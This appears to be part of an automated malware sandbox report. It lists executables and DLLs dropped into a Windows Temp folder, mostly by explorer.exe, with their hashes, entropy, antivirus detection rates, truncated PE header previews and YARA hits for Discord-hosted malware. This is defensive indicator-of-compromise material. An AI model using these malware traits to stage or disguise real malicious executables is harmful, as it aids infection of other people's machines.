                                                                                                                                                SSDEEP:48:MxHKXwYHKhQnoPtHoxHhAHKzvKvDfHK7HKhBHKdHKBSTHvmHKAHKoLHG1qHqHAHJ:iqXwYqhQnoPtIxHeqzyLq7qLqdqsOqAL
                                                                                                                                                MD5:5A67F45FC45A5C358BA694BE7D6FDE4A
                                                                                                                                                SHA1:5670BA980A3F52150C0D41B819A60AB7E0620567
                                                                                                                                                SHA-256:485DCB4FFCD317D66CAB28BC902D252C440AEE78067C651AEFA124D46073FECF
                                                                                                                                                SHA-512:0C7AFCB6CFF807B4514447019FED5BC398B488E3D7BBD332CE85AD774FB05C84AB5C5B99EC0BF48CB56CC8E8C52BEA1AA31459182F1D40234F663ECC279F6E7C
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.ServiceModel, Version=4.0.0.0, Culture=neutral
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DF3A.exe.log
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\DF3A.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1039
                                                                                                                                                Entropy (8bit):5.365622957937216
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84jE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvKvjHKs
                                                                                                                                                MD5:AE8CFF33270358D6EC23793128B3EF2F
                                                                                                                                                SHA1:5E6B156157EDEA4222A5E0C258AE9ADEBB8CB7CE
                                                                                                                                                SHA-256:498EAB9F855E7CE9B812EAD41339A9475127F0C8E7249033B975071D2292220C
                                                                                                                                                SHA-512:473111AD332D5E66724AFB0CE5A1E1C97890D60484A818D1DB8C2386A99C05BAE6C9D5C535DDFB6790BF5707C153502B938BE201393A3D70342A62902E0A3C98
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                                                                                                                                C:\Users\user\AppData\Local\Temp\0faa7aea-12bb-4849-8fa9-815fe14274fd.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1
                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:L:L
                                                                                                                                                MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: .
                                                                                                                                                C:\Users\user\AppData\Local\Temp\1105.tmp
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\CBF0.exe
                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1622408
                                                                                                                                                Entropy (8bit):6.298350783524153
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:hNZ04UyDzGrVh8xsPCw3/dzcldJndozS35IW1q/kNVSYVEs4j13HLHGJImdV4q:dGrVr3hclvnqzS35IWk/LvRHb0
                                                                                                                                                MD5:BFA689ECA05147AFD466359DD4A144A3
                                                                                                                                                SHA1:B3474BE2B836567420F8DC96512AA303F31C8AFC
                                                                                                                                                SHA-256:B78463B94388FDDB34C03F5DDDD5D542E05CDED6D4E38C6A3588EC2C90F0070B
                                                                                                                                                SHA-512:8F09781FD585A6DFB8BBC34B9F153B414478B44B28D80A8B0BDC3BED687F3ADAB9E60F08CCEC5D5A3FD916E3091C845F9D96603749490B1F7001430408F711D4
                                                                                                                                                Malicious:false
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                                Reputation:unknown
                                                                                                                                                C:\Users\user\AppData\Local\Temp\21.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):346624
                                                                                                                                                Entropy (8bit):6.008556977987189
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:rwrBNjy106UX1gBXf8fVzu3kkGwSQ46yyZ4AX/cpM0p2a4sqOD06zWusdImyJLiT:0VT1fVzBnKyyH/cKy4sqOIwyy
                                                                                                                                                MD5:A0BC297D8EAAD37F1B145D108786E993
                                                                                                                                                SHA1:AC6858536F64EC7113F1CD10B248430DA8510DB8
                                                                                                                                                SHA-256:B06B803C1A654849E7B0310B0B590CA574568AB9EBA41858E8CAAFF5DBBEACBA
                                                                                                                                                SHA-512:8C18514C5D43497B5711131B0328CBF7C6ECD51F04A60F421175786C7431B999E30BD5B16FE9345C38FD3E0C26A682A611602A1B2FE657488485246B3BA3B541
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                C:\Users\user\AppData\Local\Temp\5b81b21e-8488-49fb-af11-a55e6b006d71.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):248531
                                                                                                                                                Entropy (8bit):7.963657412635355
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:r+nmRykNgoldZ8GjJCiUXZSk+QSVh85PxEalRVHmcld9R6yYfEp4ABUGDcaKklrv:k3oF4Z4h45P99Fld9RBQYBVcaxlnfL
                                                                                                                                                MD5:541F52E24FE1EF9F8E12377A6CCAE0C0
                                                                                                                                                SHA1:189898BB2DCAE7D5A6057BC2D98B8B450AFAEBB6
                                                                                                                                                SHA-256:81E3A4D43A73699E1B7781723F56B8717175C536685C5450122B30789464AD82
                                                                                                                                                SHA-512:D779D78A15C5EFCA51EBD6B96A7CCB6D718741BDF7D9A37F53B2EB4B98AA1A78BC4CFA57D6E763AAB97276C8F9088940AC0476690D4D46023FF4BF52F3326C88
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                C:\Users\user\AppData\Local\Temp\B096.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):512512
                                                                                                                                                Entropy (8bit):7.846723941917503
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:Tw86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+LF:TVhdLVg2Zep7njXzPDxC+J
                                                                                                                                                MD5:F57B28AEC65D4691202B9524F84CC54A
                                                                                                                                                SHA1:F546B20EB40E3BC2B6929BA0F574E32422CED30C
                                                                                                                                                SHA-256:87D86132095541ED3B5FE05EB06692E1712287B6FFD9832A28EB85F52B55F0A5
                                                                                                                                                SHA-512:1A773186B0A15F743F8D9681036A9ECA45E2DD5F7944725498E929C5438ACFFCD753061EB475383E5759FC41A8ADE4EB717F3D3529313C3C0D48C659B5E36F09
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\B096.exe, Author: Florian Roth
                                                                                                                                                Reputation:unknown
                                                                                                                                                C:\Users\user\AppData\Local\Temp\BBE1.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22528
                                                                                                                                                Entropy (8bit):5.395556088889033
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:ezekc2D26R7pXha5eglsu2tiP39n+NDr7vGuywqFGc1QzOQslg:qJcMnacgl6Q10rSuywCZ1QO
                                                                                                                                                MD5:787AF677D0C317E8062B9705CB64F951
                                                                                                                                                SHA1:41BF391CE44004A22BA7F18E5FDCDCFCEA73E38F
                                                                                                                                                SHA-256:7CFA3F3EBB7DCE336E24DF02D5BA0FDBC081927892D597986113FB11EDF1702E
                                                                                                                                                SHA-512:8A9BF2D0DF12926F3253DCF5F2B5186928107C36189F404C50C69B67BC09DDA267FACD53E3259ABF3934DE6682BC3B0E49D1D5ACCFA5D4A5B702F4F9EF8D8B45
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\BBE1.exe, Author: Florian Roth
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 22%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0..N..........nl... ........@.. ..............................P.....`..................................l..S....................Z............................................................... ............... ..H............text...tL... ...N.................. ..`.rsrc................P..............@..@.reloc...............V..............@..B................Pl......H.......PK... ..........................................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\C066.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):601600
                                                                                                                                                Entropy (8bit):7.082709411162039
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:ZYr2Nn9c+v4tOOc7JMZim3+sKQS4Kwp6vHOZjV1:OrCZSyUimTTwHC
                                                                                                                                                MD5:F0BE69176E592FA1A6345A7090A9EA30
                                                                                                                                                SHA1:CF56A6E67759A06B2681170AF52902FA9CFB9128
                                                                                                                                                SHA-256:28D82936CA3150866022F80B28D5422D66F54FB6FD81321A3E853CE29FAF74FF
                                                                                                                                                SHA-512:D8E1CA5BF558DD0DC1F6281F0970FC7E7E192110315D2F275C0A49FF0CB6F65EB7217C2024FC596A29AD3D1036B51D42A622F39672BC1F0C17ABCECC3122D606
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.m.m.m..2m..m...m..m..3mq..m...m...m.m...m..6m...m...m...m...m...mRich.m................PE..L.....Q_......................p..... .............@...........................x.....zL.........................................d....@w..<....................w.....0...................................@............................................text............................... ..`.data....io.........................@....ruxat.......0w.....................@....rsrc....<...@w..<..................@..@.reloc...#....w..$..................@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\C295.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):877056
                                                                                                                                                Entropy (8bit):7.462302194895007
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:yYuSM7Gp8zSjQLCV9ibUqyuziiM95BxXEr:yv7i8zSjbVwB1ZM910r
                                                                                                                                                MD5:B79D3399603938A695A98A75DCFBAB91
                                                                                                                                                SHA1:AF9A85F2CC85CD3B040536C988AAB45C237A22D9
                                                                                                                                                SHA-256:934690E391745FCA58CA0DF6D41952D6F58ED7B18AB8FDDA22484B01EB262BE8
                                                                                                                                                SHA-512:5499156CB77B33218077A690AF2EC89D9E9C2AC20796BB2F0A889DD97E569DDD84FDEC0F7C9332523A95D47081235E1BD2240D2971CDD5153CFA906C39BFA0B5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........>.m.m.m..2m..m...m..m..3mq..m...m...m.m...m..6m...m...m...m...m...mRich.m................PE..L......_......................p..... .............@...........................|.....ja..........................................d.....{..<....................{.....0...................................@............................................text............................... ..`.data....io.........................@....vuci........p{.....................@....rsrc....<....{..<..................@..@.reloc...#....{..$...>..............@..B................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\C8FE.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):604160
                                                                                                                                                Entropy (8bit):7.081312542094628
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:zUq737aTz5aNquRVgE6/kEObrF5d/WYN4t88+wGOjsyDR:Aq7rwa0uRm8brF5LupDs
                                                                                                                                                MD5:DE692F1B4D4C63FED395BE25E878858E
                                                                                                                                                SHA1:16F5B74E898FB0CD30F127CB1E03DA79E481158A
                                                                                                                                                SHA-256:6ED753E5B9A7AC5D89A6F9749E24C5BEB7483C6FDA2057E81E1EB3ED5A32AB21
                                                                                                                                                SHA-512:24227BBCD1451E7F6A2B6C16637987B1388BE398A88005851AF24805BFD7B57AE39AE7B70E69DE3B424EE48E4FB65EF0CABD710692EBC9393F2A1542E6D8E067
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5.>.T.m.T.m.T.m."2m.T.m.".m.T.m."3mqT.m.,.m.T.m.T.m.T.m."6m.T.m.".m.T.m.".m.T.mRich.T.m........PE..L.....*_......................v.....@.............@...........................~......4..........................................d....P}..I....................}..... ...................................@............................................text.............................. ..`.data...H.u.........................@....rsrc....I...P}..J..................@..@.reloc...#....}..$..................@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\CAC5.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):278528
                                                                                                                                                Entropy (8bit):7.390894610588505
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:IdQPlt1M8RJNHUMb62VCDuy1DzJDGLkjNVlZeJjuzbgwuA7ITsq:Ialt6mJN0x2VmlhtawtcjunnF7
                                                                                                                                                MD5:FA00DF47BCC5F9AD16ED71856FB6F4D6
                                                                                                                                                SHA1:561D89B6384A44E6D47AC4B68D04FFFFF3DE3558
                                                                                                                                                SHA-256:B2F5636B2E78B3F60EA53FD0C7C95656E11C08FAC59869B38A165C7BF39CF1E5
                                                                                                                                                SHA-512:3A6ACB14B041B341C979F233D881225615B225DAC9E84F0CD62DAEC69818212A9620AE82E4B61BA5547E3A0EB9D1D8442EF52CE86BF093918203D33DDF3283CE
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......`.....................6......_%............@.............................................................................(....`..H/..............................................................@...............p............................text.............................. ..`.rdata...E.......F..................@..@.data....<..........................@....xoj....r....P......................@..@.rsrc...H/...`...0..................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\CBF0.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):212992
                                                                                                                                                Entropy (8bit):6.734269361613487
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:UJ+Dg6a/6BO0fFI4+uX67vtk4nNcDxzyuEpuVMO6P2+BwvHJ3/RA:FDy/6BOSFI48v2dxzyuEpynVP
                                                                                                                                                MD5:73252ACB344040DDC5D9CE78A5D3A4C2
                                                                                                                                                SHA1:3A16C3698CCF7940ADFB2B2A9CC8C20B1BA1D015
                                                                                                                                                SHA-256:B8AC77C37DE98099DCDC5924418D445F4B11ECF326EDD41A2D49ED6EFD2A07EB
                                                                                                                                                SHA-512:1541E3D7BD163A4C348C6E5C7098C6F3ADD62B1121296CA28934A69AD308C2E51CA6B841359010DA96E71FA42FD6E09F7591448433DC3B01104007808427C3DE
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 80%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................................................................................................PE..L......^.................V...........,.......p....@..................................q......................................\...<.... ..8............................q.................................@............p..x............................text....U.......V.................. ..`.rdata...G...p...H...Z..............@..@.data...DB..........................@....cipizi.r...........................@..@.rsrc...8.... ......................@..@........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\CD17.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):262248
                                                                                                                                                Entropy (8bit):7.344044114091331
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:7Zd5yNguYYTkxcNQoF8KzJugf/vTvN9KQqJIo:7Zd5yNguPQyNQYJuSvDLKXIo
                                                                                                                                                MD5:EDE62358EA39643E43992E9068E03CA2
                                                                                                                                                SHA1:0F73E8F96C01135A91D4E1BFECA139AD31C72C15
                                                                                                                                                SHA-256:187CB817751D6871EB7BE566DD9D9A98A46EDB11391220B69E4FAD695F31E605
                                                                                                                                                SHA-512:552B31EDA2131C8326996DEBA1812C6A6B23D892DDABDD17C3182FCD43B9019CFC863EED1FF67FA2EC21297E98F61502D3E095972D2C6710D08B3F27EA7A82F1
                                                                                                                                                Malicious:true
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 14%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....{a..............0.................. ... ....@.. .......................@............@.................................(...W.......XH..............h.... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...XH.......J..................@..@.reloc....... ......................@..B................d.......H.......................l...."..................................................................?................................?................................?................................?............................................................................................................ .......@........................................................ .......@........................................................ .......@.....................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\D8D0.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):27576
                                                                                                                                                Entropy (8bit):5.969933955399239
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:bekc2D26R7pXha5eglsu2CfQG9kyf4ZZK61TEYFGc1QzOQs42Aghgn:bJcMnacgl6EWlXzZ1QO4khgn
                                                                                                                                                MD5:FA6D8115D2266A121FE7C1552C0DDDFD
                                                                                                                                                SHA1:9166433A1F42AE7A623F26341DD9BBED91A045B3
                                                                                                                                                SHA-256:237E9E25B4DADE7BD2CCD0F6D59C9D607EEED8E60C1041F10BE3D4C50B37A459
                                                                                                                                                SHA-512:58825BAF9D243279393A635AEE9E7493682F18105D24CFAAF270BFAE54CB2FFDFE12734D7E3EB34983C554F3599BB73D523029871F28D8AFBF25CD27798C2368
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\D8D0.exe, Author: Florian Roth
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 32%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0..N...........l... ........@.. ...............................G....`..................................l..O.......,............X............................................................... ............... ..H............text....L... ...N.................. ..`.rsrc...,............P..............@..@.reloc...............V..............@..B.................l......H.......PK..L!..........................................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\DEDC.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):510976
                                                                                                                                                Entropy (8bit):7.850749525333838
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:Iw86shtDE09VgbshnKMstp7eylszgTDzLTDaMqvK8J+W:IVhdLVg2Zep7njXzPDxC+W
                                                                                                                                                MD5:B0A956B96769AA21A44206DD528C5B39
                                                                                                                                                SHA1:30CF20E67DFA3FC38C6E80B761AD0D523C5AF43A
                                                                                                                                                SHA-256:37B78E9A50830B88E97F6048F90EA0AFE925E0C6E4F0E9A1CF3C7849787D9C4C
                                                                                                                                                SHA-512:5B6D8707FA2D4B7D41D7B1733409A34645DF2B42FF064D9E7643A8F4AE7076A798B2012959AF6F8B30E44D60B28EF4B1761E0CB3287448329C9144AE9FD9CE9F
                                                                                                                                                Malicious:false
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\DEDC.exe, Author: Florian Roth
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0.............N.... ........@.. .......................@......yq....`.....................................K............................ ....................................................... ............... ..H............text...T.... ...................... ..`.rsrc...............................@..@.reloc....... ......................@..B................0.......H........u..hk..........@Z..X...........................................MZ......................@...............................................!....!This program cannot be run in DOS mode....$.......PE...................." ..P.............Z8... ...@....... ....................................@..................................8..O....@..x....................`.......7............................................... ............... ..H............text...`.... ..................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\DF3A.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):161280
                                                                                                                                                Entropy (8bit):5.163359140538006
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hj1+ax5s9jVultxyIAMzTjSMzTjoIe1UhCp:hJqjVoeN
                                                                                                                                                MD5:9FA070AF1ED2E1F07ED8C9F6EB2BDD29
                                                                                                                                                SHA1:6E1ACD6CB17AB64AC6DBF0F4400C649371B0E3BD
                                                                                                                                                SHA-256:08D67F957EC38E92301EEAAAF2759EF2A070376239EAD25864C88F3DD31EAB8C
                                                                                                                                                SHA-512:14A1CD1090A2ECCEA3B654EEE2B7D4DE390219F8C3C200D97D2AB431311BDF24B1B40F2F38E78804AD286654CD33DFB515704C9B863DAF0786A0D633F05C9BF2
                                                                                                                                                Malicious:true
                                                                                                                                                Yara Hits:
                                                                                                                                                • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\user\AppData\Local\Temp\DF3A.exe, Author: Florian Roth
                                                                                                                                                Antivirus:
                                                                                                                                                • Antivirus: ReversingLabs, Detection: 43%
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0.wa..............P..l.............. ........@.. ...................................@.....................................O....................x............................................................... ............... ..H............text....k... ...l.................. ..`.rsrc................n..............@..@.reloc...............t..............@..B.......................H.......(u..t.......A...HL...(..........................................M...Z...........................................................................................@...............................................................................................................................................................................................!...........L.......!...T...h...i...s... ...p...r...o...g...r...a...m... ...c...a...n...n...o...t... ...b...e... ...r...
                                                                                                                                                C:\Users\user\AppData\Local\Temp\E64F.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):791552
                                                                                                                                                Entropy (8bit):7.368824467033047
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:uDMkBTpEvda0f6dSctc54lTQazT6A/9Or+ilw8lCW0k7ro8R3D3INLf3:QMk+dV6dS6KazZ4rPlw8lCWYQi
                                                                                                                                                MD5:7917305400EE899130B1D5B7AFA0A159
                                                                                                                                                SHA1:D45E1A34FE773040D7034A80BBEBB3DBD3EA4252
                                                                                                                                                SHA-256:80C4B12305B41D2FDCD9DCCD53D2414C3AEA2188198F3D79AF262709C1E2DAC9
                                                                                                                                                SHA-512:417DECA0BEEE73B6EA8379B85726A9DAAF4DC32721D7A658BA42B9D359A6739F7478D3E0068C8B110497CB222956A1AFA5E1BF28C202965DEDE7A659EB824EF6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........a..........................^..................................Rich...........................PE..L...m;._......................v...................@............................................................................P....0...I.......................... ................................~..@............................................text............................... ..`.data...H.u.........................@....rsrc....I...0...J..................@..@.reloc..8$.......&..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                C:\Users\user\AppData\Local\Temp\EBBE.exe
                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):348672
                                                                                                                                                Entropy (8bit):5.997778327285649
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:0BbSn3n6QHUKl3hINRqdhUm6b8mCcNebxCg1:Eu3n6UUKlxS2Um6b8mCcNej
                                                                                                                                                MD5:539C39A9565CD4B120E5EB121E45C3C2
                                                                                                                                                SHA1:5E1975A1C8F9B8416D9F5F785882DFB0CC9161DC
                                                                                                                                                SHA-256:C673B8408DB0EB515651E6A6F3361C713903001011C6E13A1825C0376A83D1DD
                                                                                                                                                SHA-512:3CC343A53051BE34B4CAD9AA9A9AE68D6B5A978B2ECD10516E4934452D29A9455A6CEB5EB7C7B691B2D08F1781BFB7B1E3627CB2823DD4F60860861F2202BA8F
                                                                                                                                                Malicious:true
                                                                                                                                                Reputation:unknown
